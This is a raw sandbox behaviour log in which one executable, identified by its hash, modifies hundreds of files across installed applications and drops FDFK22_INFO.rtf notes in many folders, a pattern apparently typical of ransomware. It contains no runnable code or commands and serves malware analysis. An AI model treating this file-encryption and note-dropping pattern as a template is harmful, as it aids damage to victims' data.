a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Amsterdam a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\README.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_ja.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\zh-CN.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\id.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\nacl_irt_x86_64.nexe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\precomplete a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7TSFrame.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jerusalem a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Magadan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Casey a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwmon.dll.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jar.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Auckland a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-output2_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\dependentlibs.list a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\jabswitch.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.rcp_4.3.100.v20141007-2301.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Gibraltar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\drive.crx a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\FindTrace.vstm a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\liveleak.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuching a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\rmid.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Mazatlan a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9YDT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\profile.jfc a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\com.jrockit.mc.rcp.product_root_5.5.0.165303 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvm.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Update\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Currie a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\as80.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Wake a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaTypewriterBold.ttf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\ssvagent.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.net_1.2.200.v20120807-0927.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ta.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Cambridge_Bay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\js\jquery.jstree.js a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-api_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Rome a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Omsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Funafuti a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\xul.dll.sig a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belem a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-modules-appui.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Blanc-Sablon a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\en-US\MSPVWCTL.DLL.mui a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Havana a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ulaanbaatar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\httprequests.luac a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fr\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guatemala a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javah.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\Bermuda a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_winxp_blu.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\da.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Tell_City a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Dawson a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome_proxy.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-awt.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Bermuda a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\gu.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\java.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\classfile_constants.h a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_CN.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Luxembourg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-spi-actions_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_basestyle.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Kiev a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Uzhgorod a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\LINEAR_RGB.pf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Chita a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Srednekolymsk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Juneau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Windows Journal\PDIALOG.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\asl-v20.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Berlin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Rothera a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Algiers a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\jabswitch.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_xml.luac 